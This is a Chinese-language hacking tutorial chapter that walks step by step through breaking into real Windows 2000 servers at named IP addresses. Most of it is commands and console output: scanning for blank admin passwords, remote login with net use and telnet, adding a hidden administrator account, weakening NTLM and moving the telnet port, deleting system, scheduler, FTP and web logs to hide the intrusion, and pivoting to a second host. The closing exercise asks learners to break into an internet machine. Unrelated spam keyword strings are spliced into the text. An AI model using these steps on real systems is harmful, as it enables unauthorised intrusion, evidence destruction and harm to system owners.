黑客攻击完整案例

黑客完整攻击案例介绍 1. 扫描主机发现漏洞 我们用流光IV来扫描一段网址！ 点击探测－高级扫描工具！ 输入ip地址范围如下图所示 扫描IP地址范围 ? 起始地址/结束地址：需要扫描的IP地址范围。 ? 目标系统：ALL-所有系统    NT-NT／2000系统    UNIX-UNIX系统，根据选择的不同下面的［检测项目］将会有不同设置。 ? 获取主机名：获取主机的名称。 ? 检测项目：选择需要扫描的项目，根据选择的不同表单会有所不同。 高级扫描设置 如图3所示你可以自己定义你的用户字典和密码字典。 l 猜解用户名字典：设置扫描中采用的用户字典，适用于POP3/FTP/IMAP/SQL/MYSQL。 l 猜解密码字典：设置扫描中采用的密码字典，适用于POP3/FTP/IMAP/SQL/MYSQL。 l 保存扫描 报告 软件系统测试报告下载sgs报告如何下载关于路面塌陷情况报告535n,sgs报告怎么下载竣工报告下载 ：扫描的报告，采用HTML格式。 l 并发线程数目：默认80，可以根据情况增减，如果线程数目越大速度越快但是越容易误报和漏报。 l 网络选项：设置TCP参数 大概需要20分钟左右扫描结束，扫描结果如下图所示 总之我们得到了两个admin的帐号！mf和lyl密码都是空！ 2. 使用命令入侵有漏洞主机 我们点击开始运行－输入cmd单击确定 我们在命令提示符下使用net use命令远程连接主机210.192.111.207 如下图所示： 常用的网络入侵命令 这里端口78是黑客自己改的！默认端口是99  如下所示： TELNET登录到远程主机 我们已经成功登陆到主机210.192.111.207，权限是system 运用网络命令获取远程主机的信息如下图所示 网络命令获取远程主机信息 我们首先在名利提示符下输入： net name 显示那台主机的名字 在输入：ipconfig 看看他的网络配置，有两块网卡一个是内部：192.168.1.4 一个是外部的：210.192.111.207 输入：ver 对方主机显示： C:\WINNT\system32>ver Microsoft Windows 2000 [Version 5.00.2195] C:\WINNT\system32> C:\WINNT\system32>net start 已经启动以下 Windows 2000 服务: Alerter Application Management COM+ Event System Computer Browser DHCP Client Distributed File System Distributed Link Tracking Client Distributed Link Tracking Server Distributed Transaction Coordinator DNS Client Event Log File Replication Service FTP Publishing Service IIS Admin Service Indexing Service Intersite Messaging IPSEC Policy Agent Kerberos Key Distribution Center Logical Disk Manager Messenger Microsoft Search Microsoft SMTP Service MSSQLServer Net Logon Network Connections NT LM Security Support Provider Plug and Play Print Spooler Protected Storage Remote Procedure Call (RPC) Remote Procedure Call (RPC) Locator Remote Registry Service Removable Storage RunAs Service Security Accounts Manager Server SQLServerAgent System Event Notification Task Scheduler TCP/IP NetBIOS Helper Service Windows Management Instrumentation Driver Extensions Windows Time Workstation World Wide Web Publishing Service 许可 协议 离婚协议模板下载合伙人协议 下载渠道分销协议免费下载敬业协议下载授课协议下载 登录服务 命令成功完成。 C:\WINNT\system32> C:\WINNT\system32>net start telnet Telnet 服务正在启动 . Telnet 服务已经启动成功。 C:\WINNT\system32> C:\WINNT\system32> C:\WINNT\system32> C:\WINNT\system32>net user 列出远程主机的用户 有很多用户我们刚才已经启动telnet服务，现在只要增加一个用户，或者更改一个用户的密码，建议你还是增加一个用户因为如果修改别人的密码会引起怀疑！ C:\WINNT\system32> C:\WINNT\system32>net user kk kk /add 命令成功完成。 C:\WINNT\system32> C:\WINNT\system32>net localgroup administrators kk /add 命令成功完成。 C:\WINNT\system32> C:\WINNT\system32> 现在可以了！！ 我们在打开一个命令提示符窗口 输入：telnet 210.192.111.207 显示： NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password Server allows NTLM authentication only Server has closed connection 遗失对主机的连接。 C:\> 在小榕的流光IV目录下的tools目录下有一个ntlm.exe的文件 拷贝NTLM工具到远程主机的D盘上 我已经把它copy到我得D:\> 运用命令入侵对方主机 文件成功更改！！ NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password Server allows NTLM authentication only Server has closed connection 遗失对主机的连接。 C:\> 还是同样的提示,没有成功！ telnet服务停止，然后在重新启动. 我们把telnet服务停止，然后在重新启动. 我们在试一试！ 用户名：kk 密码：kk登录主机 终于ok了！我们输入刚才建立的用户名：kk 密码：kk 显示下图所示的登录界面，成功进入对方主机 TELNET登录远程主机 这个时候可能会有朋友问我！为什么你还不去黑了他的主页！我们的目的不是这个！接着往下看吧 有一个tlntadmn的命令，可以完成DOS界面下TELNET启动和关闭及更改默认端口作用如下图所示 TLNTADMN启动TELNET服务选项 我们选择：1列出当前用户如下图所示 当前对方主机上的用户 有没有看到如果对方主机上有人运行了这个程序（telnet服务器管理器）。你的ip地址和你所使用的用户名就被他看到了！ 选择3可以更改telnet断口，默认的是23，如果是我的电脑我会把它更改成自己喜欢的数字！请在下列选项中选择一个: telnet 210.192.111.207窗口显示： 0) 退出这个应用程序 1) 列出当前用户 2) 结束一个用户的会话 ... 3) 显示 / 更改注册表设置 ... 4) 开始服务 5) 停止服务 请键入一个选项的号码 [0 - 5] 以选择该选项: 3 请在下列选项中选择一个: 0) 退出这个菜单 1) AllowTrustedDomain 2) AltKeyMapping 3) DefaultDomain 4) DefaultShell 5] 以选择该选项: 5) LoginScript 6) MaxFailedLogins 7) NTLM 8) TelnetPort 请键入一个选项的号码 [0 - 8] 以选择该选项: 7 0) 退出这个菜单Domain 1) AllowTrustedDomain 5) LoginScript 6) MaxFailedLogins 7) NTLM 8) TelnetPort 请键入一个选项的号码 [0 - 8] 以选择该选项: 8 TelnetPort 的当前值 = 23 您确实想更改这个值吗 ? [y/n]y TelnetPort [ 当前值 = 23; ] :99 您确实想将 TelnetPort 设置为 : 99 ? [y/n]y 只有当 Telnet 服务重新开始后设置才会生效 请在下列选项中选择一个: 0) 退出这个菜单 1) AllowTrustedDomain 2) AltKeyMapping 3) DefaultDomain 5] 以选择该选项: 4) DefaultShell 5) LoginScript 6) MaxFailedLogins 7) NTLM 8) TelnetPort 请键入一个选项的号码 [0 - 8] 以选择该选项: 7 NTLM 的当前值 = 1 您确实想更改这个值吗 ? [y/n] ntlm的默认值是2我们刚才copy的ntlm并在他的主机运行已经改过了。 C:\>dir 驱动器 C 中的卷是 System 卷的序列号是 9CD1-C09D C:\ 的目录 2000-06-16 03:16p 524,288 a.evt 2000-04-13 01:34p 578 APInstall.log 2000-12-11 03:41p 12 calljia.txt 2000-09-15 02:45p 510 cn.data 2000-09-15 02:35p 525 eastsupplier.dat 2000-05-17 02:02p EVENTLOG 2000-04-11 05:46p 13,126 mpssetup.log 2000-08-18 09:57a 7,874 mssql.reg 2000-08-18 10:11a 17,115 mssql1.reg 2000-09-15 03:04p 2,965 named.boot 2000-09-15 02:36p 1,311 named.data 2001-03-06 02:21p PAVLN 2000-04-13 01:45p Perl 2000-08-26 04:04p php3 2001-03-19 03:02p Program Files 2001-05-10 12:00p 23,040 secwiper.exe 2000-09-15 02:13p 544 shfiec.data 2001-07-18 04:31p TEMP 2000-09-15 03:14p 1,265 trade.data 2001-07-02 09:48a WINNT 2000-09-15 02:15p 545 复件 cn.data 14 个文件 593,698 字节 7 个目录 175,907,840 可用字节 C:\> D:\>dir 驱动器 D 中的卷是 Database 卷的序列号是 C08D-17AD D:\ 的目录 2001-02-21 02:39p MSSQL7 2001-03-02 11:08a WinRoute Pro 0 个文件 0 字节 2 个目录 159,850,496 可用字节 D:\>C:\>d: D:\> D:\>dir 驱动器 D 中的卷是 Database 卷的序列号是 C08D-17AD D:\ 的目录 2001-02-21 02:39p MSSQL7 2001-03-02 11:08a WinRoute Pro 0 个文件 0 字节 2 个目录 159,850,496 可用字节 D:\> D:\>e: E:\> E:\>dir 驱动器 E 中的卷是 Www 卷的序列号是 9877-CDFE E:\ 的目录 2001-07-12 01:10p database 2001-06-01 08:36a DNS 2001-06-28 08:38a epserver 2000-04-21 04:01p ftp 2001-06-08 11:07a huajiaohui 2000-04-11 05:26p Inetpub 2000-04-11 05:46p msp 2000-04-11 05:25p Program Files 2001-06-27 04:56p recover 0 个文件 0 字节 9 个目录 1,212,620,800 可用字节 E:\> E:\>f: F:\> F:\>dir 驱动器 F 中的卷是 Internal Data 卷的序列号是 247A-2ABC F:\ 的目录 2001-06-25 12:18p EPServer 2001-06-26 09:34a KIT EP Server 1.0 0 个文件 0 字节 2 个目录 1,822,499,328 可用字节 F:\> F:\>g: G:\> G:\>dir 驱动器 G 中的卷是 Install files 卷的序列号是 C880-BB67 G:\ 的目录 1999-10-22 10:10a Logs 2001-03-01 12:08p ntinstall 2001-05-14 08:38a SetupFiles 1999-09-20 05:37p SQL SERVER 7.0 2000-09-20 12:00p SQLBackup 2000-03-21 03:13p urlcache 2000-03-21 01:10p VCD 0 个文件 0 字节 7 个目录 409,600 可用字节 G:\> 竟然有C、D、E、F、G五个盘符，我们看到了在E盘下有一个inetpub的目录，我们进去看看 E:\Inetpub>dir 驱动器 E 中的卷是 Www 卷的序列号是 9877-CDFE E:\Inetpub 的目录 2000-04-11 05:26p . 2000-04-11 05:26p .. 2001-03-02 09:58a Catalog.wci 2000-04-10 03:52p ftproot 2000-04-11 05:21p iissamples 2000-04-07 04:31p Mail 2000-04-07 04:35p Mailroot 2000-04-07 04:30p News 2000-04-11 05:11p nntpfile 2000-04-11 05:45p scripts 2001-06-28 08:12a wwwroot 0 个文件 0 字节 11 个目录 1,212,616,704 可用字节 E:\Inetpub> E:\Inetpub> 到这个时候你想坐做什么？是不是黑了他就会很是痛快！可以黑对方主页。 3. 清除远程主机的系统日志 刚才用这台肉鸡ping了一下，可以ping通！（等一下我们在去连接这台主机）现在我们要做好清除日志的准备！ Windows2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等，可能会根据服务器所开启的服务不同。应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%\system32\config，默认文件大小512KB，管理员都会改变这个默认大小。  安全日志文件：%systemroot%\system32\config\SecEvent.EVT  系统日志文件：%systemroot%\system32\config\SysEvent.EVT  应用程序日志文件：%systemroot%\system32\config\AppEvent.EVT  Internet信息服务FTP日志默认位置：%systemroot%\system32\logfiles\msftpsvc1\，默认每天一个日志  Internet信息服务WWW日志默认位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志  Scheduler服务日志默认位置：%systemroot%\schedlgu.txt  以上日志在注册表里的键：  应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的：  HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog  有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。  Schedluler服务日志在注册表中  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent  FTP和WWW日志详解：  FTP日志和WWW日志默认情况，每天生成一个日志文件，包含了该日的一切 记录 混凝土 养护记录下载土方回填监理旁站记录免费下载集备记录下载集备记录下载集备记录下载 ，文件名通常为ex（年份）（月份）（日期），例如ex001023，就是2000年10月23日产生的日志，用记事本就可直接打开。 有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。既使你删掉FTP和WWW日志，但是还是会在系统日志和安全日志里记录下来，但是较好的是只显示了你的机器名，并没有你的IP， 下面我们就来看看如何删除日志？ 打开你自己电脑的事件查看器，如下图所示 本机计算机的事件查看器 点击连接到另外一台计算机，目的去删除对方主机日志记录，如下图所示 连接到远程主机 单击确定 可能会很慢！ 对方主机的事件查看器 这样我们就可以删除事件了！一定要有耐心！可能会很慢！有时间就一个一个看然后删除！ 删除SchedLgU.Txt，如下图所示 删除SchedLgU.Txt C:\WINNT> C:\WINNT>net stop "task scheduler" Task Scheduler 服务正在停止. Task Scheduler 服务已成功停止。 C:\WINNT> C:\WINNT>del schedlgu.txt C:\WINNT> C:\WINNT> 成功删除（做了一个备份，不删除，而要替换他，在copy上去一个避免聪明的管理员使用recover回复以删除的文件 database for the task indicated. "Task Scheduler Service" Exited at 5/16/01 3:05:30 PM "Task Scheduler Service" Started at 5/16/01 3:09:42 PM "Task Scheduler Service" Exited at 5/18/01 11:23:22 PM "Task Scheduler Service" Started at 5/18/01 11:27:20 PM "Task Scheduler Service" Exited at 5/19/01 6:14:42 PM "Task Scheduler Service" Started at 5/19/01 6:18:42 PM "Task Scheduler Service" Started at 6/4/01 10:51:12 AM "At1.job" (srv.exe) Started 6/10/01 1:49:00 PM "At1.job" (srv.exe) Finished 6/10/01 1:50:00 PM Result: The task completed with an exit code of (0). "At1.job" (winshell.exe) Started 6/14/01 7:08:00 PM "Task Scheduler Service" Started at 6/15/01 2:51:00 PM "At1.job" (srv.exe) Started 6/17/01 2:47:00 PM "At1.job" (srv.exe) Finished 6/17/01 3:19:10 PM Result: The task completed with an exit code of (0). "At1.job" (srv.exe) Started 6/17/01 3:47:00 PM "At1.job" (srv.exe) Finished 6/17/01 3:50:19 PM Result: The task completed with an exit code of (0). "At1.job" (srv.exe) Started 6/17/01 3:56:00 PM "At1.job" (srv.exe) Finished 6/17/01 3:56:54 PM Result: The task completed with an exit code of (0). "At1.job" (srv.exe) Started 6/17/01 4:09:00 PM "At1.job" (srv.exe) Finished 6/17/01 4:13:19 PM Result: The task completed with an exit code of (0). "At1.job" (FsSniffer.exe) Started 6/25/01 4:14:00 PM "At1.job" (FsSniffer.exe) Finished 6/25/01 4:14:15 PM Result: The task completed with an exit code of (0). "At2.job" (SRV.EXE) Started 6/25/01 4:15:00 PM "At3.job" (RunAsEx.exe) Started 6/25/01 4:15:00 PM "At3.job" (RunAsEx.exe) Finished 6/25/01 4:15:02 PM Result: The task completed with an exit code of (0). "At4.job" (Slave.exe) Started 6/25/01 4:50:00 PM "At4.job" (Slave.exe) Finished 6/25/01 4:50:24 PM Result: The task completed with an exit code of (0). "At2.job" (SRV.EXE) Finished 6/25/01 4:56:45 PM Result: The task completed with an exit code of (ffffffff). "Task Scheduler Service" Started at 6/27/01 7:09:20 PM "Task Scheduler Service" Started at 6/29/01 4:37:31 PM "Task Scheduler Service" Exited at 7/3/01 10:43:22 PM "Task Scheduler Service" Started at 7/3/01 10:47:34 PM "Task Scheduler Service" Exited at 7/7/01 12:19:10 AM "Task Scheduler Service" Started at 7/7/01 12:23:23 AM "Task Scheduler Service" Exited at 7/7/01 12:28:32 AM "Task Scheduler Service" Started at 7/7/01 12:32:45 AM "Task Scheduler Service" Exited at 7/7/01 5:52:01 PM "Task Scheduler Service" Started at 7/7/01 5:56:00 PM "Task Scheduler Service" Exited at 7/7/01 8:24:58 PM "Task Scheduler Service" Started at 7/7/01 8:29:14 PM "Task Scheduler Service" Exited at 7/7/01 9:09:29 PM "Task Scheduler Service" Started at 7/7/01 9:13:44 PM "Task Scheduler Service" Exited at 7/7/01 9:22:37 PM "Task Scheduler Service" Started at 7/7/01 9:26:53 PM "Task Scheduler Service" Exited at 7/7/01 9:44:09 PM "Task Scheduler Service" Started at 7/7/01 9:48:12 PM "Task Scheduler Service" Exited at 7/7/01 10:43:08 PM "Task Scheduler Service" Started at 7/7/01 10:47:10 PM "Task Scheduler Service" Exited at 7/11/01 4:43:06 PM "Task Scheduler Service" Started at 7/11/01 4:47:26 PM "Task Scheduler Service" Exited at 7/16/01 2:29:22 PM "Task Scheduler Service" Started at 7/16/01 2:33:28 PM "At1.job" (srv.exe) Started 7/18/01 5:55:00 PM "At2.job" (sys.exe) 这台主机不知道已经北多少人搞过了！竟然没有人删除日志！可能是因为是国外的所以没有关系！哈哈 C:\WINNT> C:\WINNT>net start "task scheduler" Task Scheduler 服务正在启动 . Task Scheduler 服务已经启动成功。 C:\WINNT> C:\WINNT> 下一个是FTP日志和WWW日志，原理都是一样，先停掉相关服务，如下图所示 系统日志文件所在位置 删除常用的日志文件 全部删掉！ 正在删除的过程 可是还有一个无法删除 停止www服务 停止www服务 C:\WINNT> C:\WINNT>net stop "World Wide Web Publishing Service" World Wide Web Publishing Service 服务正在停止.......... World Wide Web Publishing Service 服务已成功停止。 C:\WINNT> C:\WINNT>net stop "FTP Publishing Service" FTP Publishing Service 服务正在停止. FTP Publishing Service 服务已成功停止。 C:\WINNT> C:\WINNT>net stop "IIS Admin Service" 下面的服务依赖于 IIS Admin Service 服务。 停止 IIS Admin Service 服务也会停止这些服务。 Microsoft SMTP Service 是否继续此操作? (Y/N) [N]: 没有提供有效的响应。 C:\WINNT> C:\WINNT>net stop "Microsoft SMTP Service" Microsoft SMTP Service 服务正在停止. Microsoft SMTP Service 服务已成功停止。 C:\WINNT> C:\WINNT>net stop "IIS Admin Service" ... IIS Admin Service 服务已成功停止。 C:\WINNT> C:\WINNT> 停止了四个服务在把它删掉，里面根本就没有我的ip！ 可以启动他的“Remote Registry Service”允许远程注册表操作 我们这里服务已经启动如果没有启动可以通过net start "Remote Registry Service"来启动 显示：连接网络注册表去删除远程主机的注册表，如下图所示 通过注册表去连接网络主机的注册表 输入远程主机的IP地址如下图所示 看到如下图所示远程主机的注册表如下图所示 连接到远程主机的注册表 可操作他的注册表 这台210.200.14.170的主机还是没有改掉administrator 的密码123。下图所示是用已知的用户名和密码连接它 现在可以用210.192.111.207这台主机跳到210.200.14.170主机上去 从原主机跳到另一主机 等几分钟！.... 运用网络命令入侵对方 用网络命令入侵对方 成功！210.192.111.207 的名字是DELLNT 进入被入侵者的计算机中 而210.200.14.170的名字是win2000srv 还可以证明 用IPCONFIG查看入侵者的IP地址 对话框上面写的是telnet 210.192.111.207 99 可是输入ipconfig，显示的ip地址是：210.200.14.170 这样成功用一个主机跳到另一个主机！ 你还可以一直跳下去，跳得越多越安全 本章小结 本章讲述一个完整的黑客入侵的典型的案例，通过本案例的学习，主要是巩固以前所学的知识，灵活使用运用所学工具，扫描漏洞，发现漏洞，根据漏洞进入对方主机，达到目的，然后保护自己，删除日志，通过这个过程可以提高学习者的实际动手能力及学习兴趣 本章习题 1运用所学的知识入侵互联网上的一台机器，并写出完成步骤 2写出信息安全的整体 方案 气瓶 现场处置方案 .pdf气瓶 现场处置方案 .doc见习基地管理方案.doc关于群访事件的化解方案建筑工地扬尘治理专项方案下载 ，